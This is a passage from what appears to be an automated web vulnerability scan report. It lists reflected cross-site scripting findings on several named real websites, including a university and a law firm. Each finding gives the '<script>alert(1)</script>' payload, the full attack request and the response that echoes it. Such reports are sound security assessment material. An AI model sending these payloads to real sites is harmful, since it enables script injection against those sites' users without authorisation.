X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63791


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts29665"><script>alert(1)</script>4685965d83d/tools.js?nocache=2" type="hidden" />
...[SNIP]...

4.127. http://www.haber.gen.tr/src/scripts/tools.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /src/scripts/tools.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cfa3"><script>alert(1)</script>f6fd26bb8b4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:07 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/src/scripts/tools.js2cfa3"><script>alert(1)</script>f6fd26bb8b4?nocache=2" type="hidden" />
...[SNIP]...

4.128. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 761c1"><script>alert(1)</script>3e557343cc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:12:57 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes761c1"><script>alert(1)</script>3e557343cc6/project/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.129. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6df85"><script>alert(1)</script>7f18c5be575 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:13 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project6df85"><script>alert(1)</script>7f18c5be575/style.css?nocache=2" type="hidden" />
...[SNIP]...

4.130. http://www.haber.gen.tr/themes/project/style.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.haber.gen.tr
Path:   /themes/project/style.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3070f"><script>alert(1)</script>9d19976bc93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2 HTTP/1.1
Host: www.haber.gen.tr
Proxy-Connection: keep-alive
Referer: http://www.haber.gen.tr/editac7fd%22%3E%3Cscript%3Ealert(%22IDIOT%22)%3C/script%3E0550415377b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=4a1ddd09525ee6455484044f598c30bf

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:13:17 GMT
Server: Apache/2.2.9 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 63799


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>    
...[SNIP]...
<input name="redirect" id="redirect" value="/themes/project/style.css3070f"><script>alert(1)</script>9d19976bc93?nocache=2" type="hidden" />
...[SNIP]...

4.131. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69123"><script>alert(1)</script>fab6770260 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?69123"><script>alert(1)</script>fab6770260=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:21 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=2hrmotl33mdjrmgcj2rrd55mg4; path=/
Vary: Accept-Encoding
Content-Length: 21572
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<form action="/login.php?return=/login.php?return=/submit.php?69123"><script>alert(1)</script>fab6770260=1" method="post">
...[SNIP]...

4.132. http://www.hadash-hot.co.il/submit.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hadash-hot.co.il
Path:   /submit.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 145ae--><script>alert(1)</script>51dbf0ddac4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1 HTTP/1.1
Host: www.hadash-hot.co.il
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 17 Apr 2011 14:15:27 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=ns53ppdrjhtvontg84lgr82rl4; path=/
Vary: Accept-Encoding
Content-Length: 21511
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="he" lang="he">
   
   <h
...[SNIP]...
<a href="/login.php?return=/login.php?return=/submit.php?145ae--><script>alert(1)</script>51dbf0ddac4=1">
...[SNIP]...

4.133. http://www.hawaii.edu/cybersecurity/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /cybersecurity/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72768"><script>alert(1)</script>6cb577da8e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cybersecurity72768"><script>alert(1)</script>6cb577da8e/ HTTP/1.1
Host: www.hawaii.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:18:20 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6367
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/cybersecurity72768"><script>alert(1)</script>6cb577da8e/" size="60">
...[SNIP]...

4.134. http://www.hawaii.edu/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hawaii.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ed25"><script>alert(1)</script>b6c02b9894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico5ed25"><script>alert(1)</script>b6c02b9894 HTTP/1.1
Host: www.hawaii.edu
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 17 Apr 2011 14:32:19 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.7d Resin/3.1.8 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Length: 6364
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="c
...[SNIP]...
<input type="text" name="this" value="/favicon.ico5ed25"><script>alert(1)</script>b6c02b9894" size="60">
...[SNIP]...

4.135. http://www.hoganlovells.com/AboutUs/Online_Client_Service/Overview/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /AboutUs/Online_Client_Service/Overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2a27"><script>alert(1)</script>4c036e60d13 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AboutUs/Online_Client_Service/Overview/?f2a27"><script>alert(1)</script>4c036e60d13=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:40 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1221; path=/
Set-Cookie: PortletId=1295002; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=eweajw55sht4c1afbrxbaf45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94183
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/online_client_service/overview/?f2a27"><script>alert(1)</script>4c036e60d13=1&print=true'); ">
...[SNIP]...

4.136. http://www.hoganlovells.com/aboutus/history/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/history/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bebc"><script>alert(1)</script>e3fcc433cbe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:36 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1071; path=/
Set-Cookie: PortletId=9201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=uz23b055gmgirib1s10jpge4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 97428
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/history/?7bebc"><script>alert(1)</script>e3fcc433cbe=1&print=true'); ">
...[SNIP]...

4.137. http://www.hoganlovells.com/aboutus/overview/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /aboutus/overview/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b55b2"><script>alert(1)</script>1f8b9cb08b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:39 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1068; path=/
Set-Cookie: PortletId=6201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=4ljypr45ttlk0ufexlwxwq55; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 94280
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/aboutus/overview/?b55b2"><script>alert(1)</script>1f8b9cb08b8=1&print=true'); ">
...[SNIP]...

4.138. http://www.hoganlovells.com/newsmedia/awardsrankings [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 404ee"><script>alert(1)</script>3132bf1a85b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /newsmedia/awardsrankings?404ee"><script>alert(1)</script>3132bf1a85b=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:43 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A65
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=1srtawrostncgq24dtz2r1b4; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65d45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?404ee"><script>alert(1)</script>3132bf1a85b=1&print=true'); ">
...[SNIP]...

4.139. http://www.hoganlovells.com/newsmedia/awardsrankings/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/awardsrankings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9966e"><script>alert(1)</script>9e3a488b625 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:19:53 GMT
Server: Microsoft-IIS/6.0
x-geoloc: 02
x-client: 000567
x-apptype: 02
x-prodtype: 01
x-public: 1
x-redirect: 0
x-occurrence: 02
x-server: EG-HUBRD-A66
X-UA-Compatible: IE=EmulateIE7
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: Language=7483b893-e478-44a4-8fed-f49aa917d8cf; path=/
Set-Cookie: DefaultCulture=en-US; path=/
Set-Cookie: Mode=1; path=/
Set-Cookie: EventingStatus=1; path=/
Set-Cookie: NavId=1187; path=/
Set-Cookie: PortletId=1198201; path=/
Set-Cookie: SiteId=1039; path=/
Set-Cookie: SERVER_PORT=80; path=/
Set-Cookie: Localization=TimeZone=13&UsesDaylightSavings=True&TimeZoneAbbrev=EDT&Persists=True; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/; HttpOnly
Set-Cookie: ASP.NET_SessionId=tgdjch55xqhztw2ucnfzrw45; path=/; HttpOnly
Set-Cookie: CurrentZone=AppType=WEB&AppTypeLong=Web Framework&H4ID=7&RootPortletName=ConnectWebRoot&RootPortletNavID=1038&RootPortletID=617&RootPortletH4AssetID=301&LicenseKey= &Name=Web Framework&URL=fcw; path=/; HttpOnly
Set-Cookie: ZoneId=7; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 249076
Set-Cookie: NSC_MC_Iphbo_IUUQ=ffffffff09d5f65c45525d5f4f58455e445a4a423660;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>

...[SNIP]...
<a href="javascript:void(0);" onclick="window.open('http://www.hoganlovells.com/newsmedia/awardsrankings/?9966e"><script>alert(1)</script>9e3a488b625=1&print=true'); ">
...[SNIP]...

4.140. http://www.hoganlovells.com/newsmedia/fastfacts/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hoganlovells.com
Path:   /newsmedia/fastfacts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 984c4"><script>alert(1)</script>9caa5b51498 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /newsmedia/fastfacts/?984c4"><script>alert(1)</script>9caa5b51498=1 HTTP/1.1
Host: www.hoganlovells.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 17 Apr 2011 14:18:58 GMT
